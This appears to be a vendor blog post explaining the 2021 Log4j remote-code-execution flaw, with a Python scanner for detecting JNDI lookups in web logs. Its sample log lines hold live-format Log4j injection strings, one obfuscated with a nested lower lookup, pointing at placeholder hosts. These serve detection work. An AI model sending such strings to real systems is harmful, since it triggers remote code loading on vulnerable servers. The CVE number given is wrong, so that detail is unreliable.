The Log4j vulnerability – What you need to know
As many of you know, on December 9, 2021 the Apache Log4j vulnerability (CVE-2021-4422) was discovered, affecting somewhere between 0 and 3 billion-plus devices currently running Java.
Though the vulnerability does not impact the Axiomatics platforms or solutions, we wanted to share insight on this vulnerability and what security teams should consider as they grapple with this event.
What’s going on?
On December 9, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified as being exploited in the wild. Public proof of concept (PoC) code was released, and a subsequent investigation revealed that exploitation was easy to perform.
More specifically, by submitting a specially crafted request to a vulnerable system, and depending on system configuration, an attacker can instruct that system to download and then execute a malicious payload.
Experts consider this a critical vulnerability because of its broad use in enterprise systems and web applications.
Put simply, this vulnerability will enable attackers to develop exploits that leverage a variety of attack types to gain access to critical information or processes at a wide variety of businesses.
How does this work?
Though we’re only starting to see exploits emerge, here’s an example of how an attacker could leverage this vulnerability:
- An attacker triggers a vulnerable Log4j server with a single string of text (for example, in an HTTP header).
- The Log4j instance makes an LDAP query to the LDAP server, which responds with directory information.
- Action: The application reaches out to an external location (only if the string is logged via the vulnerable instance of Log4j).
- Action: Special text is submitted in an HTTP User-Agent header or a simple POST form request.
- Action: The vulnerable Log4j instance parses this, then reaches out via the Java Naming and Directory Interface (JNDI).
- Action: A resource acts as a launch pad to another attacker-controlled endpoint, which serves Java code that is executed on the original victim.
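Because the chain above starts with a single logged string, the most direct place to spot it is in the web-server access logs that record request headers. The following scanner is an added example written for this post, not Axiomatics code or a Log4j component; the log lines are constructed, the hostnames are placeholders, and it handles only the lower/upper nested-lookup form of obfuscation, so treat it as a starting point for a detection rule rather than a complete one.

```python
"""Scan access-log lines for Log4j JNDI lookup strings (detection only)."""
import re
from typing import List, Tuple

# Constructed sample lines in combined log format; not real traffic.
# Lines 3 and 4 carry a JNDI lookup in the User-Agent field; line 4 splits
# the word "jndi" with a nested ${lower:} lookup to evade plain string matching.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:10:01:23 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/7.68.0"
10.0.0.7 - - [10/Dec/2021:10:01:24 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/a}"
10.0.0.8 - - [10/Dec/2021:10:01:25 +0000] "POST /form HTTP/1.1" 200 64 "-" "${${lower:j}ndi:rmi://placeholder.invalid/b}"
"""

# Core signature: a Log4j lookup whose scheme is jndi, e.g. "${jndi:ldap://...}".
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Log4j resolves inner lookups before the outer one, so "${${lower:j}ndi:...}"
# becomes "${jndi:...}" at runtime. Only the lower/upper forms are collapsed
# here; a production normalizer must cover the other lookup types as well.
NESTED_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:([^${}]*)\}", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested lower/upper lookups until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = NESTED_RE.sub(lambda m: m.group(1), s)
    return s


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Return (line number, client IP) for each line containing a JNDI lookup."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if JNDI_RE.search(normalize(line)):
            client = line.split(" ", 1)[0]
            hits.append((n, client))
    return hits


if __name__ == "__main__":
    for n, ip in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup string in request from {ip}")
```

Matching on the normalized string rather than the raw line is the important design choice: Log4j evaluates the inner lookups first, so a detector that only searches for the literal text `${jndi:` misses the fourth line even though the application would process it exactly like the third. A hit here is a trigger for investigation (which host logged it, whether that host runs a vulnerable Log4j 2, and whether it made any outbound LDAP or RMI connection afterwards), not proof of compromise.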
What does this mean for Axiomatics customers?
Axiomatics solutions do not use any versions of Log4j 2 impacted by this vulnerability, so no actions specific to your Axiomatics solutions are required at this time.
We will continue to monitor the emergence of attacks based on this vulnerability and will share relevant information via our knowledge base portal.
Axiomatics customers can check out the latest guidance on our knowledge base.
What else can we do?
For security teams wondering if their systems are impacted and, if so, what they can do, this blog post written by security analysts at Forrester Research offers a solid starting point.
If you’re looking for a higher-level explanation of what this means, check out this blog post from Forrester analyst Allie Mellen (aka hackerxbella).